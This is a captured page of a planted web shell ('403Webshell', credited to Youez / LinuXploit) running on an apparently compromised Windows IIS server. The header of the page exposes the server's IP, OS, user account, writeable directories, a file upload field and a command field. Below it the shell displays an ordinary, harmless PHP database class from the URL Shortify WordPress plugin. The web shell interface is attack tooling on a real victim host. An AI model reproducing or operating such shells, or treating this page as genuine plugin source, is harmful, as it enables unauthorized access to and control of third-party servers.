403Webshell
Server IP : 121.121.20.254  /  Your IP : 216.73.216.202
Web Server : Microsoft-IIS/10.0
System : Windows NT WEB-SERVER 10.0 build 20348 (Windows Server 2022) AMD64
User : IUSR ( 0)
PHP Version : 8.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/inetpub/wwwroot/KnowledgeBase/wp-content/plugins/url-shortify/lite/includes/Admin/DB/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/inetpub/wwwroot/KnowledgeBase/wp-content/plugins/url-shortify/lite/includes/Admin/DB/DB.php
<?php

namespace Kaizen_Coders\Url_Shortify\Admin\DB;

/**
 * class
 *
 * @since 1.0.0
 */
class DB {
    /**
     *
     * @var Object|Links
     *
     * @since 1.0.0
     *
     */
    public $links;

    /**
     * @var Object|Clicks
     *
     * @since 1.0.0
     */
    public $clicks;

    /**
     * @var Object|Groups
     *
     * @since 1.1.3
     */
    public $groups;

    /**
     * @var Object|Links_Groups
     *
     * @since 1.1.3
     */
    public $links_groups;

    /**
     * @var Object|Domains
     */
    public $domains;

    /**
     * @var Object|UTM_Presets
     */
    public $utm_presets;


    /**
     * constructor.
     *
     * @since 1.0.0
     */
    public function __construct() {
        $this->clicks       = new Clicks();
        $this->links        = new Links();
        $this->groups       = new Groups();
        $this->links_groups = new Links_Groups();
        $this->domains      = new Domains();
        $this->utm_presets  = new UTM_Presets();
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit